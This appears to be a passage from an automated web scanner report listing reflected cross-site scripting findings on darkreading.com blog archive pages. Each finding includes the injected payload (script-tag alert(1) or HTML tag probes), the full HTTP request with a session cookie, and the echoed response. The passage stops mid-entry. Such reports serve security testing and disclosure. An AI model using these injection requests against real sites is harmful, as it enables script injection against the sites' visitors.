GET /blog/archives/2010/04/index.html?91a4d"><script>alert(1)</script>b008b21fd28=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf85c"><a>c4d8b579723 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010cf85c"><a>c4d8b579723/05/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010cf85c%22%3E%3Ca%3Ec4d8b579723%2F05%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010cf85c"><a>c4d8b579723/05/index.html"> ...[SNIP]...
3.383. http://www.darkreading.com/blog/archives/2010/05/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2010/05/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8bb5"><script>alert(1)</script>bb2e9179417 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/05/index.html?c8bb5"><script>alert(1)</script>bb2e9179417=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38b9d"><a>3e7e18e2e49 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/201038b9d"><a>3e7e18e2e49/06/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F201038b9d%22%3E%3Ca%3E3e7e18e2e49%2F06%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/201038b9d"><a>3e7e18e2e49/06/index.html"> ...[SNIP]...
3.385. http://www.darkreading.com/blog/archives/2010/06/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2010/06/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f236d"><script>alert(1)</script>f21c37ef639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/06/index.html?f236d"><script>alert(1)</script>f21c37ef639=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b351"><a>758b77eba16 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20108b351"><a>758b77eba16/07/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46cf0"><a>5df536d55ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010/0746cf0"><a>5df536d55ba/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010%2F0746cf0%22%3E%3Ca%3E5df536d55ba%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010/0746cf0"><a>5df536d55ba/index.html"> ...[SNIP]...
3.388. http://www.darkreading.com/blog/archives/2010/07/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2010/07/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fef38"><script>alert(1)</script>7f4830ddf48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/07/index.html?fef38"><script>alert(1)</script>7f4830ddf48=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 495e6"><a>55b917b5393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010495e6"><a>55b917b5393/08/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453b9"><a>7edd556c3da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010/08453b9"><a>7edd556c3da/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010%2F08453b9%22%3E%3Ca%3E7edd556c3da%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010/08453b9"><a>7edd556c3da/index.html"> ...[SNIP]...
3.391. http://www.darkreading.com/blog/archives/2010/08/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2010/08/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec3a5"><script>alert(1)</script>6a956421196 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/08/index.html?ec3a5"><script>alert(1)</script>6a956421196=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31256"><a>56cf0e24733 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/201031256"><a>56cf0e24733/09/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51985"><a>67e725aa285 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010/0951985"><a>67e725aa285/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010%2F0951985%22%3E%3Ca%3E67e725aa285%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010/0951985"><a>67e725aa285/index.html"> ...[SNIP]...
3.394. http://www.darkreading.com/blog/archives/2010/09/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2010/09/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46475"><script>alert(1)</script>5139aad4e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/09/index.html?46475"><script>alert(1)</script>5139aad4e5=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 590a8"><a>0c54cf42c59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010590a8"><a>0c54cf42c59/10/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfcc9"><a>62aeb9e2e6e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010/10cfcc9"><a>62aeb9e2e6e/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010%2F10cfcc9%22%3E%3Ca%3E62aeb9e2e6e%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010/10cfcc9"><a>62aeb9e2e6e/index.html"> ...[SNIP]...
3.397. http://www.darkreading.com/blog/archives/2010/10/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2010/10/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eefc1"><script>alert(1)</script>d19ea4b7d4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/10/index.html?eefc1"><script>alert(1)</script>d19ea4b7d4d=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b300d"><a>fe2ae17d4c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010b300d"><a>fe2ae17d4c8/11/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd737"><a>3fd3d68a714 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010/11bd737"><a>3fd3d68a714/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010%2F11bd737%22%3E%3Ca%3E3fd3d68a714%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010/11bd737"><a>3fd3d68a714/index.html"> ...[SNIP]...
3.400. http://www.darkreading.com/blog/archives/2010/11/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2010/11/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b6f"><script>alert(1)</script>f19358c7f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/11/index.html?61b6f"><script>alert(1)</script>f19358c7f6=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 308ff"><a>05b4961a19f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010308ff"><a>05b4961a19f/12/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6138"><a>31a39e17017 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010/12d6138"><a>31a39e17017/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010%2F12d6138%22%3E%3Ca%3E31a39e17017%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010/12d6138"><a>31a39e17017/index.html"> ...[SNIP]...
3.403. http://www.darkreading.com/blog/archives/2010/12/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2010/12/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7ae8"><script>alert(1)</script>cee037e6c5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/12/index.html?d7ae8"><script>alert(1)</script>cee037e6c5a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70b79'%3bc6ce1495d76 was submitted in the REST URL parameter 3. This input was echoed as 70b79';c6ce1495d76 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/cs-island70b79'%3bc6ce1495d76/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1afcd"><script>alert(1)</script>390ea43a200 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/cs-island1afcd"><script>alert(1)</script>390ea43a200/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ding.com%2Fblog%2Farchives%2Fcs-island1afcd%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E390ea43a200%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/cs-island1afcd"><script>alert(1)</script>390ea43a200/index.html"> ...[SNIP]...
3.406. http://www.darkreading.com/blog/archives/cs-island/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/cs-island/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c187"><script>alert(1)</script>1285d44a994 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/cs-island/index.html?2c187"><script>alert(1)</script>1285d44a994=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d930"><script>alert(1)</script>1a1bb26cd95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
